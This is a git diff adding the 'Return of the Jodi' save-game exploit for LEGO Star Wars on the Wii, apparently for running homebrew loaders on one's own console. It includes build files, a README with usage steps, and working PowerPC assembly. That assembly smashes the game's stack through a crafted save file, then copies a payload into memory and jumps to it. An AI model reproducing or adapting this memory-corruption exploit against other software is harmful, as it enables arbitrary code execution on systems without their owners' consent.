LEGO Star Wars by roto

diff --git a/Makefile b/Makefile
index d9920c089d790a803f21b5fdc6e7c9059d490d3f..65f82d31b2eb8f6f1f90bf5f7b8d162baa6a219d 100644 (file)
--- a/Makefile
+++ b/Makefile
@@ -53,6 +53,7 @@ all: FORCE .version
        $(Q)$(MAKE) -C twilight
        $(Q)$(MAKE) -C lego
        $(Q)$(MAKE) -C batman
        $(Q)$(MAKE) -C twilight
        $(Q)$(MAKE) -C lego
        $(Q)$(MAKE) -C batman

+       $(Q)$(MAKE) -C lsw

 
 FORCE:
 
 
 FORCE:
 


@@ -62,3 +63,4 @@ clean:
        $(MAKE) -C twilight clean
        $(MAKE) -C lego clean
        $(MAKE) -C batman clean
        $(MAKE) -C twilight clean
        $(MAKE) -C lego clean
        $(MAKE) -C batman clean

+       $(MAKE) -C lsw clean

diff --git a/lsw/.gitignore b/lsw/.gitignore
new file mode 100644 (file)
index 0000000..7b626cd
--- /dev/null
+++ b/lsw/.gitignore
@@ -0,0 +1,5 @@
+rlg?.bin
+FILE_V28
+exploit.bin
+exploit.elf
+title.bin

diff --git a/lsw/Makefile b/lsw/Makefile
new file mode 100644 (file)
index 0000000..60e345f
--- /dev/null
+++ b/lsw/Makefile
@@ -0,0 +1,127 @@
+# Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+# Copyright      2011  roto <roto@mozy.org>
+# Copyright      2011  Bernhard Urban <lewurm@gmail.com>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+
+# Configuration:
+
+# What toolchain prefix should we use
+CROSS ?= broadway-
+
+# Where are the tools (http://git.infradead.org/users/segher/wii.git)
+TOOLS ?= $(HOME)/wii/segher
+
+# End of configuration.
+
+
+
+# Set CC, LD, OBJCOPY based on CROSS, unless they are set already
+
+ifeq ($(origin CC), default)
+       CC := $(CROSS)gcc -m32
+endif
+ifeq ($(origin LD), default)
+       LD := $(CROSS)ld
+endif
+OBJCOPY ?= $(CROSS)objcopy
+
+
+# The compiler flags we need.
+
+CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750
+
+
+# Build with "V=1" to see the commands executed; be quiet otherwise.
+
+ifeq ($(V),1)
+       Q :=
+else
+       Q := @
+       MAKEFLAGS += --no-print-directory
+endif
+
+
+targets := rlge.bin rlgp.bin rlgj.bin
+
+ppms := $(targets:%.bin=%-icon.ppm) generic-banner.ppm
+assets := title.bin $(ppms)
+
+loader := ../loader/loader.bin
+
+
+titleid = $(shell perl titleid.pl $(1))
+
+
+define twintig
+       D=$(call titleid,$(1));                         \
+       $(TOOLS)/twintig $$D $@ toc-$1
+endef
+
+
+all: $(targets)
+
+$(targets): %.bin: toc-% FILE_V28 $(assets)
+       @echo "  TWINTIG   $@"
+       $(Q)$(call twintig,$*)
+
+FILE_V28: head.bin exploit.bin $(loader)
+       @echo "  LEGOSTACK $@"
+       $(Q)./pack.sh $@ $^
+       $(Q)$(TOOLS)/lego-cksum $@ 32380 #32328 #32688
+
+head.bin: head.elf
+       @echo "  OBJCOPY   $@"
+       $(Q)$(OBJCOPY) -Obinary $< $@
+
+exploit.bin: exploit.elf
+       @echo "  OBJCOPY   $@"
+       $(Q)$(OBJCOPY) -Obinary $< $@
+
+exploit.elf: lego.lds exploit.o
+       @echo "  LINK      $@"
+       $(Q)$(LD) -T $^ -o $@
+
+head.elf: head.o
+       @echo "  LINK      $@"
+       $(Q)$(LD) -e 0 $< -o $@
+
+exploit.o: exploit.s
+       @echo "  ASSEMBLE  $@"
+       $(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+head.o: head.s head.b exploit2.s exploit.bin
+       @echo "  ASSEMBLE  $@"
+       $(Q)$(CC) $(CFLAGS) \
+               -Wa,--defsym,exploitlen=$(shell wc -c exploit.bin | awk '{ print $$1 }') \
+               -c $< -o $@
+
+title.bin: ../.version
+       @echo "  TITLEBIN  $@"
+       $(Q)perl make-title-bin.pl > $@
+
+../.version: FORCE
+       $(Q)$(MAKE) -C .. .version
+
+$(ppms): %.ppm: %.png
+       @echo "  PPM       $@"
+       $(Q)convert $< $@
+
+zero16k:
+       $(Q)dd if=/dev/zero bs=18256 count=1 2>/dev/null > $@
+#17332
+#16384
+FAILURE:
+       $(Q)echo FAILURE > $@
+
+$(loader): FORCE
+       $(Q)$(MAKE) -C ../loader
+
+FORCE:
+
+clean:
+       -rm -f $(targets) FILE_V28
+       -rm -f exploit.bin exploit.elf exploit.o
+       -rm -f head.bin head.elf head.o
+       -rm -f title.bin

diff --git a/lsw/README b/lsw/README
new file mode 100644 (file)
index 0000000..060c267
--- /dev/null
+++ b/lsw/README
@@ -0,0 +1,41 @@
+Copyright 2011  roto <roto@mozy.org>
+Copyright 2011  Bernhard Urban <lewurm@gmail.com>
+Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+Copyright 2008  Haxx Enterprises  <bushing@gmail.com>
+Copyright 2008  Hector Martin "marcan"  <marcan@marcansoft.com>
+Copyright 2003-2004  Felix Domke <tmbinc@elitedvb.net>
+
+This code is licensed to you under the terms of the GNU GPL, version 2;
+see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+Console font created by Freddy Leitner [www.dreamer.de], based on
+the Droid Sans Mono font [www.droidfonts.com].
+
+--
+
+This is the Lego Star Wars exploit known as "Return of the Jodi". This exploit
+works on all versions of the game (including 1.01) in all regions that are
+currently known to have a release.
+
+Instructions:
+
+1. Copy the save to your SD card.
+2. Put a "boot.elf" (such as the HackMii installer or Homebrew Channel) into the
+   ROOT of your SD card (not into any folder).
+3. Copy the save to your Wii system, make sure you have a save for this game
+   already on your system, otherwise you won't be able to copy the exploit
+   save over.
+4. Start up the game, load the first save slot (on the left, at 0.0%)
+5. As soon as the level loads, run to the right and you'll see two characters
+   floating. Run to the area in front of them and you'll see "Return of Jodi"
+   show up, press the "A" button on your Wiimote and your boot.elf will run!
+
+
+Credits: 
+Team Twiizers - Original LIJ release, source, savezelda (and many other things).
+roto - Developing and testing this exploit.
+lewurm - Cleaning up, fixing bugs, testing.
+drmr - Awesome banner/icons!
+
+Thanks:
+Everyone!

diff --git a/lsw/exploit.s b/lsw/exploit.s
new file mode 100644 (file)
index 0000000..f5b6bbd
--- /dev/null
+++ b/lsw/exploit.s
@@ -0,0 +1,38 @@
+# Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+# Copyright      2011  roto <roto@mozy.org>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+       .section .start,"ax"
+
+start:
+       # Set up a stack frame.
+       lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1)
+
+       # Stop audio and video.
+       lis 0,audio_stop@h ; ori 0,0,audio_stop@l ; mtctr 0 ; bctrl
+       lis 0,video_stop@h ; ori 0,0,video_stop@l ; mtctr 0 ; bctrl
+
+       # Move code into place; a generous 32kB, starting at 64kB in
+       # the save file.
+
+       # Load address where we're going to move our exploit code to
+       # (0x90000020) into R03
+       lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4
+
+       # Load the address for the beginning of our save data
+       # (0x91168ea0) into R04
+       lis 4,save@h ; ori 4,4,save@l ; addi 4,4,-4
+
+       addis 4,4,1 ; addi 4,4,end-start
+       li 0,0x2000 ; mtctr 0
+0:     lwzu 0,4(4) ; stwu 0,4(5) ; bdnz 0b
+
+       # Sync caches on it.
+       li 0,0x0400 ; mtctr 0 ; mr 5,3
+0:     dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz 0b
+       sync ; isync
+
+       # Jump to 0x90000020 and go for it!
+       mtctr 3 ; bctr
+end:

diff --git a/lsw/exploit2.s b/lsw/exploit2.s
new file mode 100644 (file)
index 0000000..a845958
--- /dev/null
+++ b/lsw/exploit2.s
@@ -0,0 +1,57 @@
+# Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+# Copyright      2011  roto <roto@mozy.org>
+# Copyright      2011  Bernhard Urban <lewurm@gmail.com>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+       bptr = 0x91178ea0
+       save = 0x91177f40
+       main = 0x90000020
+
+       audio_stop_usa = 0x8038ce9c
+       video_stop_usa = 0x8039971c
+
+       audio_stop_eur = 0x8038cfec
+       video_stop_eur = 0x80399708
+
+       audio_stop_data = 0x9421fff0 # stwu 1,-16(1)
+       video_stop_data = 0x9421ffe0 # stwu 1,-32(1)
+
+       # Set up a stack frame.
+       lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1)
+
+       # Stop audio.
+       lis 10,audio_stop_data@h ; ori 10,10,audio_stop_data@l
+       lis 3,audio_stop_usa@h ; ori 3,3,audio_stop_usa@l; lwz 5,0(3)
+       cmpw 5,10 ; beq execa
+       lis 3,audio_stop_eur@h ; ori 3,3,audio_stop_eur@l
+execa:
+       mtctr 3 ; bctrl
+
+       # Stop video.
+       lis 10,video_stop_data@h ; ori 10,10,video_stop_data@l
+       lis 3,video_stop_usa@h ; ori 3,3,video_stop_usa@l; lwz 5,0(3)
+       cmpw 5,10 ; beq execv
+       lis 3,video_stop_eur@h ; ori 3,3,video_stop_eur@l
+execv:
+       mtctr 3 ; bctrl
+
+       # Move code into place; a generous 32kB, starting at 64kB in
+       # the save file.
+       lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4
+       lis 4,save@h ; ori 4,4,save@l ; addi 4,4,-4
+
+       addis 4,4,1 ; addi 4,4,exploitlen # offset for exploit.bin
+
+       li 0,0x2000 ; mtctr 0
+loop1:
+       lwzu 0,4(4) ; stwu 0,4(5) ; bdnz loop1
+
+       # Sync caches on it.
+       li 0,0x0400 ; mtctr 0 ; mr 5,3
+loop2:
+       dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz loop2
+       sync ; isync
+
+       # Go for it!
+       mtctr 3 ; bctr

diff --git a/lsw/generic-banner.png b/lsw/generic-banner.png
new file mode 100644 (file)
index 0000000..870b6bb
Binary files /dev/null and b/lsw/generic-banner.png differ

diff --git a/lsw/generic-banner.ppm b/lsw/generic-banner.ppm
new file mode 100644 (file)
index 0000000..bfe9257
Binary files /dev/null and b/lsw/generic-banner.ppm differ

diff --git a/lsw/head.b b/lsw/head.b
new file mode 100755 (executable)
index 0000000..cae261d
Binary files /dev/null and b/lsw/head.b differ

diff --git a/lsw/head.s b/lsw/head.s
new file mode 100644 (file)
index 0000000..6670b80
--- /dev/null
+++ b/lsw/head.s
@@ -0,0 +1,43 @@
+# Copyright      2011  roto <roto@mozy.org>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+       bptr = 0x91178ea0
+
+0:
+       # Part of the savefile
+       .long 0x00000001, 0x00000000, 0x00000000, 0x00000000
+       .long 0x00000000, 0x00000013, 0x0000000d, 0x00000000
+       .long 0x00000002, 0x00000000, 0x000007db, 0x00000000
+       .long 0x00000001, 0x0000029e, 0x0000019d, 0x00050000
+       .long 0x01010008, 0x060a0100, 0x00000001, 0x00000000
+       .long 0x00000000, 0x00000000, 0x00000000, 0x00000000
+
+       # Filler
+        .fill 0xF60 - (. - 0b)
+
+exploitv2:
+       # This is necessary for the 2nd exploit  (first release) of LSW
+       .include "exploit2.s"
+
+       # More filler
+       .fill 0x7860 - (. - 0b) 
+
+       # Insert rest of the save
+       .incbin "head.b"
+
+       # Smack the stack.
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111, 0x11111111, 0x11111111, 0x11111111
+       .long 0x11111111
+
+       # Depending on the version we jump now to exploit.s or to "exploit2v:"
+       .long 0x11111111,       bptr, 0x11111111, 0x11111111
+
+       .fill 0x10000 - (. - 0b)

diff --git a/lsw/lego.lds b/lsw/lego.lds
new file mode 100644 (file)
index 0000000..1718044
--- /dev/null
+++ b/lsw/lego.lds
@@ -0,0 +1,26 @@
+/* Copyright 2008-2009  Segher Boessenkool  <segher@kernel.crashing.org>
+   This code is licensed to you under the terms of the GNU GPL, version 2;
+   see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt  */
+
+OUTPUT_FORMAT("elf32-powerpc")
+OUTPUT_ARCH(powerpc:common)
+
+SECTIONS {
+       audio_stop = 0x8038ce90;
+       video_stop = 0x80399708;
+
+       save = 0x91168ea0;
+       bptr = 0x91178ea0;
+       
+       main = 0x90000020;
+
+       .twilight save :
+       {
+               rli*.o(.start)
+               *(.text)
+               *(.rodata .rodata.*)
+               *(.data)
+               *(.bss)
+               /* . = 0x0a94; */
+       }
+}

diff --git a/lsw/make-title-bin.pl b/lsw/make-title-bin.pl
new file mode 100755 (executable)
index 0000000..4bcc5d7
--- /dev/null
+++ b/lsw/make-title-bin.pl
@@ -0,0 +1,16 @@
+#!/usr/bin/perl
+sub printline {
+       my $x = shift;
+       chomp $x;
+       $x .= "\0" x 32;
+       $x = substr $x, 0, 32;
+       $x =~ s/(.)/\0$1/g;
+
+       print $x;
+}
+
+$name = "Return of the Jodi";
+$version = `cat ../.version`;
+
+printline $name;
+printline $version;

diff --git a/lsw/pack.sh b/lsw/pack.sh
new file mode 100755 (executable)
index 0000000..57a388b
--- /dev/null
+++ b/lsw/pack.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+TARGET=$1; shift
+cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null > $TARGET

diff --git a/lsw/rlge-icon.png b/lsw/rlge-icon.png
new file mode 100644 (file)
index 0000000..222c293
Binary files /dev/null and b/lsw/rlge-icon.png differ

diff --git a/lsw/rlge-icon.ppm b/lsw/rlge-icon.ppm
new file mode 100644 (file)
index 0000000..0b55e59
Binary files /dev/null and b/lsw/rlge-icon.ppm differ

diff --git a/lsw/rlgj-icon.png b/lsw/rlgj-icon.png
new file mode 100644 (file)
index 0000000..cc0edc0
Binary files /dev/null and b/lsw/rlgj-icon.png differ

diff --git a/lsw/rlgj-icon.ppm b/lsw/rlgj-icon.ppm
new file mode 100644 (file)
index 0000000..6388419
Binary files /dev/null and b/lsw/rlgj-icon.ppm differ

diff --git a/lsw/rlgp-icon.png b/lsw/rlgp-icon.png
new file mode 100644 (file)
index 0000000..706e616
Binary files /dev/null and b/lsw/rlgp-icon.png differ

diff --git a/lsw/rlgp-icon.ppm b/lsw/rlgp-icon.ppm
new file mode 100644 (file)
index 0000000..4fb2024
Binary files /dev/null and b/lsw/rlgp-icon.ppm differ

diff --git a/lsw/titleid.pl b/lsw/titleid.pl
new file mode 100755 (executable)
index 0000000..f735f1d
--- /dev/null
+++ b/lsw/titleid.pl
@@ -0,0 +1,2 @@
+#!/usr/bin/perl
+print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0];

diff --git a/lsw/toc-rlge b/lsw/toc-rlge
new file mode 100644 (file)
index 0000000..3d42533
--- /dev/null
+++ b/lsw/toc-rlge
@@ -0,0 +1,4 @@
+title.bin
+generic-banner.ppm
+rlge-icon.ppm
+FILE_V28 FILE_V28

diff --git a/lsw/toc-rlgj b/lsw/toc-rlgj
new file mode 100644 (file)
index 0000000..7f52ef8
--- /dev/null
+++ b/lsw/toc-rlgj
@@ -0,0 +1,4 @@
+title.bin
+generic-banner.ppm
+rlgj-icon.ppm
+FILE_V28 FILE_V28

diff --git a/lsw/toc-rlgp b/lsw/toc-rlgp
new file mode 100644 (file)
index 0000000..bf2a58e
--- /dev/null
+++ b/lsw/toc-rlgp
@@ -0,0 +1,4 @@
+title.bin
+generic-banner.ppm
+rlgp-icon.ppm
+FILE_V28 FILE_V28